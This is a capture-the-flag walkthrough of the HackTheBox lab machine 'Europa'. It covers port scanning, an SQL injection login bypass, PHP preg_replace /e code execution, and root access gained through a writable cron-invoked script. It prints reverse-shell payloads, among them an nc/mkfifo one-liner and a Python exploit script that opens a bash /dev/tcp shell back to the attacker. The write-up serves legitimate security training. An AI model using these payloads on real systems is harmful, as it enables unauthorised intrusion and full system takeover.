Europa

Enumeration

As usual, we start with an nmap scan, in order to find open ports in the target machine.

The following nmap command will scan the target machine looking for open ports in a fast way and saving the output into a file:

nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.22 -oN allPorts

  • -sS use the TCP SYN scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.

  • --min-rate 5000 nmap will try to keep the sending rate at or above 5000 packets per second.

  • -p- scanning the entire port range, from 1 to 65535.

  • -T5 insane mode, it is the fastest mode of the nmap time template.

  • -Pn assume the host is online.

  • -n scan without reverse DNS resolution.

  • -oN save the scan result into a file, in this case the allports file.

# Nmap 7.92 scan initiated Wed Jan 12 18:13:52 2022 as: nmap -sS --min-rate 5000 -p- -T5 -Pn -n -oN allPorts 10.10.10.22
Nmap scan report for 10.10.10.22
Host is up (0.076s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http
443/tcp open  https

# Nmap done at Wed Jan 12 18:14:19 2022 -- 1 IP address (1 host up) scanned in 27.11 seconds

As we see, ports 22,80,443 are open. Let's try to obtain more information about the service and version running on those ports. The following command will scan these ports more in depth and save the result into a file:

nmap -sC -sV -p22,80,443 10.10.10.22 -oN targeted

  • -sC performs the scan using the default set of scripts.

  • -sV enables version detection.

  • -oN save the scan result into file, in this case the targeted file.

# Nmap 7.92 scan initiated Wed Jan 12 18:15:53 2022 as: nmap -sCV -p22,80,443 -oN targeted 10.10.10.22
Nmap scan report for 10.10.10.22
Host is up (0.056s latency).

PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 6b:55:42:0a:f7:06:8c:67:c0:e2:5c:05:db:09:fb:78 (RSA)
|   256 b1:ea:5e:c4:1c:0a:96:9e:93:db:1d:ad:22:50:74:75 (ECDSA)
|_  256 33:1f:16:8d:c0:24:78:5f:5b:f5:6d:7f:f7:b4:f2:e5 (ED25519)
80/tcp  open  http     Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.18 (Ubuntu)
443/tcp open  ssl/http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_ssl-date: TLS randomness does not represent time
| tls-alpn: 
|_  http/1.1
|_http-server-header: Apache/2.4.18 (Ubuntu)
| ssl-cert: Subject: commonName=europacorp.htb/organizationName=EuropaCorp Ltd./stateOrProvinceName=Attica/countryName=GR
| Subject Alternative Name: DNS:www.europacorp.htb, DNS:admin-portal.europacorp.htb
| Not valid before: 2017-04-19T09:06:22
|_Not valid after:  2027-04-17T09:06:22
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Jan 12 18:16:14 2022 -- 1 IP address (1 host up) scanned in 21.18 seconds

We have an HTTPS server, and nmap detected the europacorp.htb and the admin-portal.europacorp.htb domain names. Let's include them to the /etc/hosts file.

# Host addresses
127.0.0.1  localhost
127.0.1.1  alfa8sa
::1        localhost ip6-localhost ip6-loopback
ff02::1    ip6-allnodes
f02::2     ip6-allrouters
10.10.10.22    europa.htb    admin-portal.europacorp.htb

Virtual hosting is a method for hosting multiple domain names (with separate handling of each name) on a single server.

If we search for the admin-portal.europacorp.htb domain name on the browser we should see a login page.

Exploitation

At this point I tried some random credentials, but I couldn't get in. So I tried to do an SQL Injection attack. Let's try some random credentials, intercept the request with Burpsuite and send it to the Repeater.

If we try to modify the request adding the ' character at the end of the email we will get an SQL error.

email=admin%40admin.com'&password=admin

If we can select all the columns of the current table, we'll be able to pass through the login page. To know how many columns there are, we will have to make a union select 1,2-- - query. If we try with only2 columns, we'll get an error saying that there is not that number of columns.

email=admin%40admin.com'union select 1,2-- -&password=admin

If we try 3 columns we'll get the same error. But, if we keep trying, will get a 302 response with 5 columns.

email=admin%40admin.com'union select 1,2,3,4,5-- -&password=admin

Let's put that query in the Proxy > Intercept and forward it. We shloud pass through the login page.

If we click on the Tools section, we will see a text in a JSON format in which we can replace the ip_address field with anything that we introduce.

If we introduce some random text we should see it appear where the ip_address value was.

If we intercept the previous request with Burpsuite and send it to the repeater, we'll see that the the ip_address value is between the / characters.

pattern=/ip_address/&ipaddress=alfa8sa&text=...

At this point, I searched for PHP regular expressions vulnerabilities and I found this article, which explains that you could have Remote Code Execution (RCE) by adding the e modifier after the second /.

pattern=/ip_address/e&ipaddress=system('whoami')&text=...

Time to get a shell. Let's set a netcat listener on port 4444.

nc -lvnp 4444

  • -l listen mode.

  • -v verbose mode.

  • -n numeric-only IP, no DNS resolution.

  • -p specify the port to listen on.

Now, instead of executing whoami, let's run a command to get us a reverse shell. We will get the shell as the www-data user, and we'll be able to grab the user flag.

pattern=/ip_address/e&ipaddress=system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.9 4444 >/tmp/f')&text=...

listening on [any] 4444 ...
connect to [10.10.14.9] from (UNKNOWN) [10.10.10.22] 59000
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
$ cat /home/john/user.txt
2f8d40cc05295154a9c3452c19ddc221

Here's a python script which automates getting initial foothold.

#!/usr/bin/python3

from pwn import *
import requests
import urllib3

def def_handler(sig, frame):
    print('\n[!] Saliendo...')
    sys.exit(1)

# Ctrl+C
signal.signal(signal.SIGINT, def_handler)

login_url = "https://admin-portal.europacorp.htb/login.php"
exploit_url = "https://admin-portal.europacorp.htb/tools.php"

def makeRequest():
    urllib3.disable_warnings()
    s = requests.session()
    s.verify = False

    post_data = {
        "email": "admin%40europacorp.htb' union select 1,2,3,4,5-- -+",
        "password": "admin"
    }

    r = s.post(login_url, data=post_data)

    post_data = {
        "pattern": "/ip_address/e",
        "ipaddress": """system("bash -c 'bash -i >& /dev/tcp/10.10.14.9/4444 0>&1'")""",
        "text": '"ip_address"'
    }
    
    r = s.post(exploit_url, data=post_data)
    
if __name__ == '__main__':

    try:
        threading.Thread(target=makeRequest, args=()).start()
    except Exception as e:
        log.error(str(e))

    shell = listen(4444, timeout=20).wait_for_connection()
    shell.interactive()

Privilege Escalation

First of all, let's set an interactive TTY shell.

script /dev/null -c /bin/bash

Then I press Ctrl+Z and execute the following command on my local machine:

stty raw -echo; fg

Next, I export a few variables:

export TERM=xterm

export SHELL=bash

Finally, I run the following command in our local machine:

stty size

51 236

And set the proper dimensions in the victim machine:

stty rows 51 columns 236

We can see there is a crontab task running as root.

cat /etc/crontab

# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
* * * * *       root    /var/www/cronjobs/clearlogs

Let's try to see what is the content of that file.

#!/usr/bin/php
<?php
$file = '/var/www/admin/logs/access.log';
file_put_contents($file, '');
exec('/var/www/cmd/logcleared.sh');
?>

It is a PHP file, which replace the content of a file with an empty string and then executes a bash binary. Let's find out more information about that binary.

ls -l /var/www/cmd/logcleared.sh

ls: cannot access '/var/www/cmd/logcleared.sh': No such file or directory

The file doesn't exists. The idea is to create that file and write a bash command which gives the /bin/bash the SUID permission. So when the crontab task is executed as the root user, we'll be able to get a shell as root.

nano /var/www/cmd/logcleared.sh

#!/bin/bash
chmod +s /bin/bash

If we wait for 1 minute, we'll see that the SUID bit gets activated on the /bin/bash binary.

ls -l /bin/bash

-rwsr-sr-x 1 root root 1037528 May 16  2017 /bin/bash

Now all we have to do is reap the harvest and take the root flag.

bash -p

bash-4.3# whoami
root
bash-4.3# cat /root/root.txt 
7f19438b27578e4fcc8bef3a029af5a5

Last updated

Was this helpful?